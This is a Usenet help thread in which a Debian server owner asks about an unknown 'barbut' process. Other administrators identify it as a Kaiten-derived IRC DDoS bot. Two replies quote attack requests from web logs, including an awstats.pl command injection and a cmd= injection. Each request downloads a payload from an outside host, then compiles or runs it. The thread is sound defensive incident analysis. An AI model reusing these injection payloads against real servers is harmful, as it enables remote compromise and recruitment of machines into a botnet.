barbut process using 100% cpu and connecting

Hello all!
i've already tried to find answer by searching usenet, but no results.
my problem is: I have my debian 3.1 sarge linux as 24/7 router/server
etc.
some day i found some strange activity.
there was a process called "barbut" (2 of them) using 49,2% CPU time
each :O
meanwhile netstat showed established connections to 195.73.177.146:666
+ several waiting.
I have no idea where did this process come from. Any clues?
this is whay ps -A printed
serwer:~# ps -A
PID TTY TIME CMD
1 ? 00:00:02 init
2 ? 00:00:00 keventd
3 ? 00:00:00 ksoftirqd_CPU0
4 ? 00:00:00 kswapd
5 ? 00:00:00 bdflush
6 ? 00:00:00 kupdated
99 ? 00:00:01 kjournald
295 ? 00:00:00 kcopyd
297 ? 00:00:00 kmirrord
498 ? 00:00:00 khubd
1267 ? 00:00:04 dhclient
1801 ? 00:00:01 syslogd
1807 ? 00:00:00 klogd
1851 ? 00:00:00 postmaster
1856 ? 00:00:00 postmaster
1857 ? 00:00:00 postmaster
1883 ? 00:00:00 courierlogger
1884 ? 00:00:00 authdaemond
1898 ? 00:00:00 authdaemond
1899 ? 00:00:00 authdaemond
1900 ? 00:00:00 authdaemond
1901 ? 00:00:00 authdaemond
1902 ? 00:00:00 authdaemond
1906 ? 00:00:00 cupsd
1916 ? 00:00:00 dhcpd
1948 ? 00:00:00 mysqld_safe
1985 ? 00:00:00 mysqld
1986 ? 00:00:00 logger
1987 ? 00:00:00 mysqld
1988 ? 00:00:00 mysqld
1989 ? 00:00:00 mysqld
1990 ? 00:00:00 mysqld
1991 ? 00:00:00 mysqld
2002 ? 00:00:00 mysqld
2003 ? 00:00:00 mysqld
2004 ? 00:00:00 mysqld
2005 ? 00:00:00 mysqld
2008 ? 00:00:00 mysqld
2046 ? 00:00:00 inetd
2112 ? 00:00:00 master
2121 ? 00:00:00 qmgr
2122 ? 00:00:02 nmbd
2123 ? 00:00:00 nmbd
2125 ? 00:00:00 smbd
2138 ? 00:00:00 smbd
2141 ? 00:00:00 sshd
2209 ? 00:00:00 ntpd
2228 ? 00:00:00 atd
2235 ? 00:00:00 cron
2256 ? 00:00:00 apache-ssl
2312 tty1 00:00:00 getty
2313 tty2 00:00:00 getty
2314 tty3 00:00:00 getty
2315 tty4 00:00:00 getty
2316 tty5 00:00:00 getty
2317 tty6 00:00:00 getty
14285 ? 00:00:00 gcache
14289 ? 00:00:00 apache-ssl
14290 ? 00:00:00 apache-ssl
14291 ? 00:00:00 apache-ssl
14292 ? 00:00:00 apache-ssl
14293 ? 00:00:00 apache-ssl
14302 ? 00:00:02 apache2
14327 ? 00:00:00 apache2
14328 ? 00:00:00 apache2
14329 ? 00:00:00 apache2
14330 ? 00:00:00 apache2
14331 ? 00:00:00 apache2
14798 ? 00:00:00 apache2
16306 ? 00:00:00 apache2
16381 ? 00:00:00 apache2
16382 ? 00:00:00 apache2
16383 ? 00:00:00 apache2
21869 ? 00:00:00 pickup
22055 ? 00:00:00 sshd
22059 pts/0 00:00:00 bash
22259 ? 00:00:00 sshd
22263 ? 00:00:00 sshd
22272 ? 00:00:00 barbut
22276 pts/0 00:00:00 ps

any strange processes? or something i should look for?

Re: barbut process using 100% cpu and connecting

Hi,

krzysiek schrieb:
> there was a process called "barbut" (2 of them) using 49,2% CPU time
> each :O

Have you installed such a program? Where is it installed? What kind of
files are around that place?

> meanwhile netstat showed established connections to 195.73.177.146:666
> + several waiting.

Some host in .nl.

> I have no idea where did this process come from. Any clues?

I don't know about you, but I would take the machine off the net and
try to understand what happened.
After that, reinstall without the hole.

Cheers,
Jens

Re: barbut process using 100% cpu and connecting

A long gap since this post, but I've just noticed "barbut" in our web
server logs, googled, and found nothing but this query:

On Jul 16, 6:15pm Jens Hoffman wrote:

> krzysiek schrieb:

> > there was a process called "barbut" (2 of them) using 49,2% CPU time
> > each :O
> > meanwhile netstat showed established connections to 195.73.177.146:666
> > + several waiting.
> Some host in .nl.
> > I have no idea where did this process come from. Any clues?
> I don't know about you, but I would take the machine off the net and
> try to understand what happened.


I hope the original poster did that - here's the "barbut" occurrence in
our apache log:

GET /awstats.pl?configdir=|echo;cd%20/tmp;wget%20217.79.176.126/ barbut;chmod%20755%20barbut;./barbut;
echo| HTTP/1.1

(there are four attempts, trying different paths to awstats.pl)

I did the wget, and it's a 30KB ELF executable. 'nm' shows such things as
'flooders', 'getspoofs', 'changeservers' ... I don't think I'll run it ;-)

Googling for some of those names finds this is probably the source code:

http://packetstormsecurity.nl/irc/kaiten.c

The comments start:

"This is a IRC based distributed denial of service client. It connects
to the server specified below and accepts commands via the channel
specified."

Hope this was useful,
A.

Re: barbut process using 100% cpu and connecting

On 19 Nov, 10:03, "A" wrote:
> Googling for some of those names finds this is probably the source code:
>
> http://packetstormsecurity.nl/irc/kaiten.c

I've found similar requests in yesterdays log (19/Nov/2007:20:02:53
+0100)
"GET ?=?&cmd=cd /tmp;killall -9 barbut;rm -f barbut.c;rm -f
barbut;wget http://crekom.com/barbut.c;gcc barbut.c -o barbut;./
barbut ; HTTP/1.1"

W.r.t. the sources mentioned above, barbut.c has been changed,
including the following differences:

* The CHAN (channel to join) changed from "#whatever" to "#whatever1"
* The server list has been replaced by the single entry
"217.79.176.126"
* The initial connection was has changed from port 6667 to port 113
* The "run command" macro has changed from "SH " to "ZK "
* The MODE sent by func _376 has changed from "MODE %s -xi" to "MODE
%s +iwx"

That didn't apparently succeed, so I don't know who are the victims...

Re: barbut process using 100% cpu and connecting

On Nov 20, 1:46 am, ale2007 wrote:
> On 19 Nov, 10:03, "A" wrote:
>
> > Googling for some of those names finds this is probably the source code:
>
> > http://packetstormsecurity.nl/irc/kaiten.c
>
> I've found similar requests in yesterdays log (19/Nov/2007:20:02:53
> +0100)
> "GET ?=?&cmd=cd /tmp;killall -9 barbut;rm -f barbut.c;rm -f
> barbut;wgethttp://crekom.com/barbut.c;gccbarbut.c -o barbut;./
> barbut ; HTTP/1.1"
>
> W.r.t. the sources mentioned above, barbut.c has been changed,
> including the following differences:
>
> * The CHAN (channel to join) changed from "#whatever" to "#whatever1"
> * The server list has been replaced by the single entry
> "217.79.176.126"
> * The initial connection was has changed from port 6667 to port 113
> * The "run command" macro has changed from "SH " to "ZK "
> * The MODE sent by func _376 has changed from "MODE %s -xi" to "MODE
> %s +iwx"
>
> That didn't apparently succeed, so I don't know who are the victims...

I found the same connection to my Imail server and Sophos posted this
a few minutes ago.

http://www.sophos.com/security/analyses/trojkaitenw.html